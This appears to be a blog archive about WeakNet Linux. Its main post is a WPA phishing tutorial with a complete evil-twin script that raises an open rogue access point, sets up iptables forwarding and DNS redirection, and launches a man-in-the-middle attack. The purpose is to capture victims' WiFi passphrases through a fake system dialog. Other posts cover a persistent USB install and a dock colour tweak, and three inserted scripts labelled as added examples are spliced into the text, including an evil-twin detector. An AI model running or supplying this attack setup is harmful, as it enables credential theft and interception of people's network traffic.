Category Archives: WeakNet Linux


It’s hard to keep up with every project I start since I am a one-man band as of late. I do admit that I love the RF hacking projects the most! One of them, the WPA Phishing Attack, was a simple way to phish a WPA/WPA2/WPA2 Enterprise password without the use of FreeRADIUS-WPE. It simply creates a fake AP that a user can connect to outside of the physical area in which the victim AP is located. Then it forwards all traffic through the attacker machine, and when the victim opens a web browser, he or she is presented with a fake Windows/OSX pop-up window that “requires” the WiFi pass-phrase again.

For instance, say a victim is using “WorkAP” and heads over to another building where the WorkAP or mesh does not reach. Next, the attacker starts the evil twin AP called “WorkAP” without any encryption enabled and awaits clients. (You MUST wait for clients before running the ./MiTM.sh file or Ettercap will kill the window.) Usually what happens when someone sees an AP of the same name is that they just click connect. Once connected, they are presented with a password input for the WiFi network as soon as the browser opens. Here is a video presentation I made back in 2010 and published on YouTube in Feb of 2011:

This new tutorial below is another one provided by The Musket Team and was posted in the comments section of my original WPA Phishing Attack Presentation weblog post. I have edited it slightly and styled it. Thank you Musket Team!

The WPA Phishing program in both WeakNet Linux 3.6 and 4.2 has several bugs.
For example, in the WeaknetAP.sh file the line:
firefox http://127.0.0.1/wpa-credcheck.php &
points to a file in the /var/www folder that does not exist. And there are others.

The Musket Team has gotten the program to run in both WeakNet Linux versions. Here is a step-by-step method.
The program requires a dhcp-server file placed in the /etc/init.d/ folder.
Write the following with a text editor and name it dhcp-server. Make sure that in the properties/permissions you check “allow executing the file as a program”.

#!/bin/sh
#############start of dhcp-server file#########
###location= /etc/init.d/ #################
#
### BEGIN INIT INFO
# Provides: dhcp-server
# Required-Start: $remote_fs $network $syslog
# Required-Stop: $remote_fs $network $syslog
# Should-Start: $local_fs slapd $named
# Should-Stop: $local_fs slapd
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: DHCP server
# Description: Dynamic Host Configuration Protocol Server
### END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

test -f /usr/sbin/dhcpd || exit 0

# It is not safe to start if we don't have a default configuration...
if [ ! -f /etc/default/dhcp-server ]; then
    echo "/etc/default/dhcp-server does not exist! - Aborting..."
    echo "Run 'dpkg-reconfigure dhcp-server' to fix the problem."
    exit 0
fi

. /lib/lsb/init-functions

# Read init script configuration (so far only interfaces the daemon
# should listen on.)
[ -f /etc/default/dhcp-server ] && . /etc/default/dhcp-server

NAME=dhcpd
DESC="DHCP server"
DHCPDPID=/var/run/dhcpd.pid

test_config()
{
    if ! /usr/sbin/dhcpd -t -q > /dev/null 2>&1; then
        echo "dhcpd self-test failed. Please fix the config file."
        echo "The error was: "
        /usr/sbin/dhcpd -t
        exit 1
    fi
}

# single arg is -v for messages, -q for none
check_status()
{
    if [ ! -r "$DHCPDPID" ]; then
        test "$1" != -v || echo "$NAME is not running."
        return 3
    fi
    # read the pid from the pidfile and check that the process still exists
    if read pid < "$DHCPDPID" && ps -p "$pid" > /dev/null 2>&1; then
        test "$1" != -v || echo "$NAME is running."
        return 0
    else
        test "$1" != -v || echo "$NAME is not running but $DHCPDPID exists."
        return 1
    fi
}

case "$1" in
    start)
        test_config
        log_daemon_msg "Starting $DESC" "$NAME"
        start-stop-daemon --start --quiet --pidfile $DHCPDPID \
            --exec /usr/sbin/dhcpd -- -q $INTERFACES
        sleep 2

        if check_status -q; then
            log_end_msg 0
        else
            log_failure_msg "check syslog for diagnostics."
            log_end_msg 1
            exit 1
        fi
        ;;
    stop)
        log_daemon_msg "Stopping $DESC" "$NAME"
        start-stop-daemon --stop --quiet --pidfile $DHCPDPID
        log_end_msg $?
        rm -f "$DHCPDPID"
        ;;
    restart | force-reload)
        test_config
        $0 stop
        sleep 2
        $0 start
        if [ "$?" != "0" ]; then
            exit 1
        fi
        ;;
    status)
        echo -n "Status of $DESC: "
        check_status -v
        exit "$?"
        ;;
    *)
        echo "Usage: $0 {start|stop|restart|force-reload|status}"
        exit 1
esac

exit 0
#############end of dhcp-server file ############

The WeaknetAP.sh file has other bugs. Here is a complete rewrite for you to test. Write the following with a text editor, name the file WeakNetAP.sh, then copy it to /pwnt/WiFu/airbase-ng/. Again, make sure that in the properties/permissions you check “allow executing the file as a program”.

#!/bin/bash
#################start of WeakNetAP.sh ################
# location= /pwnt/WiFu/airbase-ng/
# WeakAP startup script: (c) 2010 GNU License.
#
# Written by Trevelyn
# Douglas[at]WeakNetLabs[dot]com
# for WeakNet Linux 4.2i
#
# This creates a Rogue AP from your device,
# Starts DHCP Server in the range 192.168.0.0,
# Forwards all traffic caught to your internet connection
# and starts capturing packets, creating a PCAP file.
# --> Creating a highly advanced MITM attack.
#
# This script was meant to be an "out of the box" attack
# setup for WeakNet linux Version 4.2i users.
#
# This application comes without warranty, I am not responsible
# For any damages caused by using this script.
#
# Please refer to the GNU license included in the Tarball.
#
# Start the web server now:
/etc/init.d/lighttpd start
# open firefox to the credentials checker:
firefox http://127.0.0.1/wpa.php &
#
devchk=`iwconfig 2>/dev/null | grep Monitor`;
# clean up services before starting...
/etc/init.d/dhcp3-server stop
killall -9 dhclient
killall -9 dhclient3
killall -9 dnsspoof
killall -9 ettercap
# begin:
echo "<<>>"
if [ "$devchk" != "" ]; then
    echo "[ + ] Good you have a Monitor enabled WiFu Device :-)"
else
    echo "[ X ] You have no Monitor mode enabled device!"
    echo "[ X ] Let's create one..."
    devmk=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk '{print $1}'`
    ifconfig $devmk up && iwconfig $devmk channel 11
    echo "[ + ] Creating device from $devmk"
    if [ "$devmk" = "ath0" ]; then
        airmon-ng stop ath0;
        airmon-ng start wifi0;
    else
        airmon-ng start $devmk 2>/dev/null
    fi

    DEV=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk '{print $1}'`
    iwconfig $DEV channel 11
    iwconfig $DEV channel 11
    iwconfig $DEV channel 11
    if [ "$DEV" != "" ]; then
        echo "[ ! ] Done, our new device is $DEV"
    else
        echo "[ X ] Something went really wrong! :-("
        echo "[ X ] Please Check your settings and try again."
    fi
fi
DEV=`iwconfig 2>/dev/null | grep Monitor | awk '{print $1}'`
echo "Shall we use $DEV as our Monitor device? (y/n)"
read foo;

if [ "$foo" = "n" ]
then echo "Which monitor enabled device shall I use?"
    read DEV
fi

echo "What would you like to name the AP? (ESSID)"
read ESSID
echo "Which channel should the AP use? (CHANNEL)"
read CHANNEL
echo "[ + ] Starting soft AP in new Eterm window, for debugging with $DEV"
echo "[ > ] And ESSID: $ESSID"
echo "[ > ] And CHANNEL: $CHANNEL"
Eterm -e sh -c "airbase-ng -c $CHANNEL -C 30 --essid $ESSID -v $DEV; bash" &
sleep 2;
echo "[ + ] adding route for packet forwarding..."
ifconfig at0 up 192.168.0.1
ifconfig at0 netmask 255.255.255.0
ff=`ifconfig | grep "at0" | awk '{print $1}'`
if [ "$ff" = "at0" ]
then echo "[ + ] at0 is on and up"
else echo "[ X ] at0 is not up, something went wrong"
fi
echo "[ + ] at0 device is now in IP range: 192.168.0.1~254..."
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo "[ + ] cleaning out iptables settings..."
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[ + ] changing iptables to forward packets..."
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
echo "[ + ] changing '/proc/sys/net/ipv4/ip_forward' to allow forwarding..."
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[ + ] Adding new rules to iptables to forward packets from at0 to wlan0"
echo "[ > ] Make sure you have an IP with wlan0!"
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.10.0.1
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo "[ + ] Backing up DHCP3 configuration file to /etc/dhcp3/dhcpd.conf.backup..."
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
echo "[ + ] Dumping contents from /pwnt/WiFu/airbase-ng/dhcpd3-server.conf into /etc/dhcp3/ file..."
cat dhcpd3-server.conf > /etc/dhcp3/dhcpd.conf
ifconfig at0 up 192.168.0.1 netmask 255.255.255.0
/etc/init.d/lighttpd start
echo "[ + ] Starting DHCP server with configuration from /etc/dhcp3/dhcpd.conf"
/etc/init.d/isc-dhcp-server start
echo "[ ! ] All done with script, hope all is up and running! :-)"
echo "[ ? ] Would you like to start a MITM attack against all requests?"
echo "[ ! ] Wait until you see an association in the airbase-ng window before running."
echo "[ ! ] If it fails, simply run ./MITM.sh again until it starts."
echo "[ ? ] This is perfect for faking RADIUS authentication."
echo "[ ? ] (y/n)?"
read ans
if [ "$ans" = "y" ]
then ./MITM.sh &
else
    echo "Okay Then!"
fi
#################end of WeakNetAP.sh ################

Other considerations: we suggest you start your wifi adapter in monitor mode before you run the program. At start you might get error messages as the program tries to kill nonexistent programs.

You must download the WPA phishing files from WeakNet Labs and place them in the /var/www/ folder. Make sure you allow read-write on these files and, again, make sure that in the properties/permissions you check “allow executing these files as a program”. If firefox gives you the wrong files etc., point it to 127.0.0.1 and/or make sure the permissions are correct, then shut down, restart and go phishing again.

You can keep the original WeakNetAP.sh; just rename it to WeakNetAP.sh.orig.
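The evil twin described in the post above (a second BSSID broadcasting a known ESSID with no encryption) is also exactly what a defender wants to spot. The script below is an added example written for this page; it is not part of the original post or of the Musket Team's scripts. It runs two checks over a scan listing whose format (one network per line as BSSID,CHANNEL,PRIVACY,ESSID) and contents are constructed for the example, and the inventory of legitimate BSSIDs it compares against is likewise made up; a real deployment would feed it the output of its own wireless scanner and its own list of managed access points.

```shell
#!/bin/sh
# Added defensive example, not from the original post or its scripts.
# Scan listing format (constructed for this example), one network per line:
#   BSSID,CHANNEL,PRIVACY,ESSID
# PRIVACY is OPN for an open network, otherwise whatever the scanner reports
# (WPA2, WPA, WEP, ...).

# Constructed sample scan; every BSSID and ESSID below is made up.
SAMPLE_SCAN='00:11:22:33:44:01,6,WPA2,WorkAP
00:11:22:33:44:02,6,WPA2,WorkAP
66:77:88:99:AA:BB,11,OPN,WorkAP
00:11:22:33:44:03,1,WPA2,GuestNet
DE:AD:BE:EF:00:01,11,OPN,CoffeeShop'

# Constructed inventory of the BSSIDs we actually operate.
KNOWN_BSSIDS='00:11:22:33:44:01
00:11:22:33:44:02
00:11:22:33:44:03'

# find_evil_twins SCAN: print "ESSID BSSID CHANNEL" for every open network
# whose ESSID is also seen with encryption anywhere in the scan. An open
# network that only ever appears open (CoffeeShop) is not reported.
find_evil_twins() {
  printf '%s\n' "$1" | awk -F',' '
    $3 != "OPN" { secured[$4] = 1; next }
    { bssid[NR] = $1; chan[NR] = $2; essid[NR] = $4 }
    END {
      for (i in essid)
        if (essid[i] in secured)
          print essid[i], bssid[i], chan[i]
    }' | sort
}

# find_rogue_bssids SCAN KNOWN ESSID: print "BSSID CHANNEL PRIVACY" for every
# BSSID advertising ESSID that is not in the KNOWN inventory. This also catches
# a twin that copies the real AP's encryption settings.
find_rogue_bssids() {
  printf '%s\n' "$1" | awk -F',' -v known="$2" -v essid="$3" '
    BEGIN { n = split(known, k, "\n"); for (i = 1; i <= n; i++) inv[k[i]] = 1 }
    $4 == essid && !($1 in inv) { print $1, $2, $3 }' | sort
}

echo "Open networks reusing a secured ESSID:"
find_evil_twins "$SAMPLE_SCAN"
echo "BSSIDs advertising WorkAP that are not in our inventory:"
find_rogue_bssids "$SAMPLE_SCAN" "$KNOWN_BSSIDS" WorkAP
```

The first check catches the exact case in the post (an open network reusing a secured ESSID); the second catches a twin that copies the real AP's encryption settings as well, which is why an inventory of legitimate BSSIDs is the stronger signal to alert on.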

This post is directly from the comments section of the original non-persistent post for USB installations. All credit for this post goes to their team and John for all of their hard work :)

Musket Team Alpha has finally managed to make a Weakerth4n 8 gig persistent flash drive. They re-did the procedure on a 16 gig and 32 gig. All worked flawlessly. We have yet to update and/or upgrade.

Here is how they did it:

Using XP and unetbootin-windows-583 (see pics above in this blog) we selected in the drop-down distribution menus:

Debian and Stable_HdMedia

In the Diskimage we browsed to the position of the file:

WT.BG.v1.9.ISO

Ignore the entry for the space used to preserve files across reboots (Ubuntu only).
Select the correct USB drive, click OK and let unetbootin do its work.
The program will hang at 10 of 14 files for a while and then complete the install.
After unetbootin has completed the install, boot the program from the USB to check that the program functions in live mode, then shut down.
The flash drive was initially formatted in Fat32. You need to add an ext4 partition.
Start a Linux-based distribution that has gparted installed (NOT the USB flash drive you just produced, as it is locked during the partitioning process).

We used Backtrack5R3(BT5R3) and installed gparted to it. After BT5R3 is up and running insert the usb flash drive and run gparted from the terminal window with the command:

gparted /dev/sdb

Partition the flash drive as follows:
Make a second primary partition of approximately 3.5 gig by first resizing (shrinking) the Fat32 partition and then making a second ext4 primary partition labeled live-rw from the unallocated space.

IMPORTANT

  • Use ext4 format
  • make a primary partition
  • label the ext4 partition live-rw

We ended up with (Partition / File System / Label / Size):

  • /dev/sdb1  fat32  3.62 GiB
  • /dev/sdb2  ext4  live-rw  3.87 GiB

Now go to the fat32 partition on the flash drive.
Open the syslinux.cfg with a text editor.
Add the following command block:

label persistent usb
menu label persistent usb
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash persistent

The new complete syslinux.cfg looks like this:
==================

default menu.c32
prompt 0
menu title UNetbootin
timeout 100

label persistent usb
menu label persistent usb
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash persistent

label unetbootindefault
menu label Default
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash
label ubnentry0
menu label Live
kernel /live/vmlinuz
append initrd=/live/initrd.img boot=live config quiet splash

label ubnentry1
menu label Live (failsafe)
kernel /live/vmlinuz
append initrd=/live/initrd.img boot=live config noapic noapm nodma nomce nolapic nomodeset radeon.modeset=0 nouveau.modeset=0 nosmp vga=normal

label ubnentry2
menu label hd - boot the first hard disk
kernel /ubnkern
append initrd=/ubninit -

=====================

You do not have to rewrite the syslinux.cfg. You can run the program and when the unetbootin menu appears hit the TAB key and you will see:
append initrd=/ubninit boot=live config quiet splash

Just press the space bar, type the word persistent and press Enter. HOWEVER, we prefer changing the syslinux.cfg as it saves us from having to remember exactly what word to type.
To test for persistence make a text file and save it to root or home, shut the program down, remove the usb, reinsert and restart. The text file should still be there.
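Besides the text-file test, the two things the procedure depends on can be checked mechanically: an ext4 partition labelled live-rw, and a syslinux.cfg entry whose append line carries the word persistent. The script below is an added example, not part of the post. It reads blkid-style output and the syslinux.cfg text as strings; the samples embedded in it are constructed (the UUIDs and the UNETBOOT label are made up). On a real drive you would pass it the output of blkid for the USB device and the contents of the FAT32 partition's syslinux.cfg.

```shell
#!/bin/sh
# Added example, not from the original post: verify the persistence setup.

# Constructed blkid output for a drive prepared as described in the post.
SAMPLE_BLKID='/dev/sdb1: LABEL="UNETBOOT" UUID="1234-ABCD" TYPE="vfat"
/dev/sdb2: LABEL="live-rw" UUID="0f0f0f0f-0000-0000-0000-000000000000" TYPE="ext4"'

# Constructed blkid output for a drive where the label was mistyped.
BAD_BLKID='/dev/sdb1: LABEL="UNETBOOT" UUID="1234-ABCD" TYPE="vfat"
/dev/sdb2: LABEL="live_rw" UUID="0f0f0f0f-0000-0000-0000-000000000000" TYPE="ext4"'

# Constructed excerpt of the edited syslinux.cfg (the two entries that matter).
SAMPLE_CFG='default menu.c32
label persistent usb
menu label persistent usb
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash persistent
label unetbootindefault
menu label Default
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash'

# persistence_partition BLKID_OUTPUT: print the device that is ext4 and
# labelled exactly live-rw, or nothing if no partition qualifies.
persistence_partition() {
  printf '%s\n' "$1" | awk '
    /LABEL="live-rw"/ && /TYPE="ext4"/ { sub(/:$/, "", $1); print $1 }'
}

# persistent_entries CFG_TEXT: print the name of every syslinux entry whose
# append line contains the word "persistent" (exact word, not a substring).
persistent_entries() {
  printf '%s\n' "$1" | awk '
    $1 == "label" { name = $2; for (i = 3; i <= NF; i++) name = name " " $i }
    $1 == "append" { for (i = 2; i <= NF; i++) if ($i == "persistent") print name }'
}

# check_persistence BLKID_OUTPUT CFG_TEXT: succeed only if both requirements hold.
check_persistence() {
  dev=$(persistence_partition "$1")
  entries=$(persistent_entries "$2")
  if [ -z "$dev" ]; then
    echo "FAIL: no ext4 partition labelled live-rw"
    return 1
  fi
  if [ -z "$entries" ]; then
    echo "FAIL: no boot entry passes 'persistent' on its append line"
    return 1
  fi
  echo "OK: $dev will be used by boot entry: $entries"
  return 0
}

check_persistence "$SAMPLE_BLKID" "$SAMPLE_CFG"
check_persistence "$BAD_BLKID" "$SAMPLE_CFG" || true
```

The label check is deliberately strict: live-boot looks for the literal label live-rw, so a near miss such as live_rw produces a drive that boots but silently discards changes, which is the failure the text-file test in the post would reveal.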

We hope this repays the developer of this software in some small way.
MTA (a group of hackers and remote viewers)

https://code.google.com/p/entify-pm

I created Entify to have the latest and greatest of not only my applications, but others’ too, including mostly all bleeding-edge WiFi hacking and administration applications, specifically compiled to take full advantage of all resources.

Entify will use my web-server as a repository for the source code tarballs.

I will be releasing an ALPHA copy to the Google Code page sometime this week or weekend. stay tuned!

~Douglas

wbar is an amazing light-weight dock application that I have been using with FluxBox for years. Recently, with the release of WEAKERTH4N: BLUE GHOST, I made my own icon theme and set for the distro which clashed with the white letters used in the text of wbar making it unreadable:

So I decided to download the latest version of wbar and take a looksy at the sauce. To compile this code you will need the following dependencies:

libglade2-dev
libimlib2-dev
intltool

Which you can install on Debian systems with aptitude – no problem.

I use grep when troubleshooting or reverse engineering code – it’s my first go-to for analyzing others’ code. I grepped recursively for the word color and found the lines:

/* draw text */
imlib_context_set_color(0, 0, 0, 255);
imlib_text_draw(tw+1, th+1, cur_ic->text.c_str());
imlib_context_set_color(255, 255, 255, 255);

in the file ./src/core/SuperBar.cc. This function [imlib_context_set_color] looks familiar, and the values are R, G, B, A for red, green, blue and transparency respectively. Also I knew that the color white is all colors combined and usually has the highest values: (HEX) #ffffff or, in our case of 256 bit (RGB) (0-255), 255-255-255. Black is the lowest: (HEX) #000000 or 0,0,0 in 256 bit RGB. Then I looked up the RGB set for the color yellow to match my theme and found that it was 255,255,0 and HEX #ffff00. I changed the bottom function (since they are just layers, I figured the bottom layer was for the shadow) and ran:

make clean && make uninstall && make && make install

It worked! The first function [imlib_context_set_color] makes the color of the drop shadow, which is black. So then I decided to make the line unique by removing the spaces between the commas and integers like so:

imlib_context_set_color(255,255,255,255);

which obviously didn’t break the function, and then wrote a simple sed script (colorchange.sh) to change the color on the fly, pre-compilation:

#!/bin/bash
# usage: ./colorchange.sh R G B A  (each 0-255)
# rewrites the no-space imlib_context_set_color(...) line in src/core/SuperBar.cc in place;
# the shadow line keeps its spaces after the commas and so is never matched
sed -i -r -e "s/(imlib_context_set_color\()[0-9]+,[0-9]+,[0-9]+,[0-9]+\)/\1$1,$2,$3,$4\)/" src/core/SuperBar.cc

Now we can just look up the color code in a chart like this one: http://www.tayloredmktg.com/rgb/ and pass the values to the script like so:

./colorchange.sh 255 255 0 255

The lower the last number, the more transparent the text color will be, but make sure you match it with the shadow!
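The one-line colorchange.sh above takes whatever it is given and writes it straight into the source. The script below is an added example, not from the post or from wbar: it wraps the same sed substitution in a function that first checks that all four components are integers in 0-255, and adds two helpers that read the text and shadow tuples back so the result (and the untouched shadow) can be verified. It works on a constructed four-line stand-in for the relevant part of src/core/SuperBar.cc, written to a temporary file, rather than on the real source tree.

```shell
#!/bin/sh
# Added example, not from the original post or the wbar project.

# make_sample_source FILE: write a constructed stand-in for the relevant lines
# of src/core/SuperBar.cc. The shadow line keeps spaces after the commas, the
# text line does not, so the substitution pattern only ever matches the text line.
make_sample_source() {
  printf '%s\n' \
    '/* draw text */' \
    'imlib_context_set_color(0, 0, 0, 255);' \
    'imlib_text_draw(tw+1, th+1, cur_ic->text.c_str());' \
    'imlib_context_set_color(255,255,255,255);' > "$1"
}

# is_byte VALUE: succeed only for a non-negative integer no larger than 255.
is_byte() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -le 255 ]
}

# colorchange FILE R G B A: validate the components, then apply the same sed
# substitution as colorchange.sh to FILE. Returns 2 without touching the file
# on bad input.
colorchange() {
  [ $# -eq 5 ] || { echo "usage: colorchange FILE R G B A" >&2; return 2; }
  file=$1; shift
  for v in "$@"; do
    is_byte "$v" || { echo "bad component '$v' (expected 0-255)" >&2; return 2; }
  done
  sed -i -E "s/(imlib_context_set_color\()[0-9]+,[0-9]+,[0-9]+,[0-9]+\)/\1$1,$2,$3,$4\)/" "$file"
}

# text_color FILE: print the text tuple, i.e. the no-space line, e.g. 255,255,0,255.
text_color() {
  sed -n -E 's/^imlib_context_set_color\(([0-9]+,[0-9]+,[0-9]+,[0-9]+)\);$/\1/p' "$1"
}

# shadow_color FILE: print the shadow tuple, i.e. the line with spaces, e.g. 0, 0, 0, 255.
shadow_color() {
  sed -n -E 's/^imlib_context_set_color\(([0-9]+, [0-9]+, [0-9]+, [0-9]+)\);$/\1/p' "$1"
}

demo=$(mktemp)
make_sample_source "$demo"
colorchange "$demo" 255 255 0 255   # yellow text, fully opaque, as in the post
echo "text: $(text_color "$demo")   shadow: $(shadow_color "$demo")"
rm -f "$demo"
```

Reading both tuples back is the quick way to honour the closing advice above: if you lower the alpha of the text, compare it against the shadow tuple before you rebuild.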

~Douglas

The last release was broken due to the Linux 3.8.X kernel not playing well with unionfs – which is pretty lame. Also there was an awful Java fonts bug that ruined dpkg. I was able to fix both and rolled the kernel back to 3.7.10 which has been tested on USB and working properly with Unetbootin. The newer kernel makes the ISO smaller. So, I present to you, version 1.9!

Download from HaxRadio:

http://hr.weaknetlabs.com

FreeRADIUS-WPE with WEAKERTH4N Instructional Video: Easy! :D

~Douglas
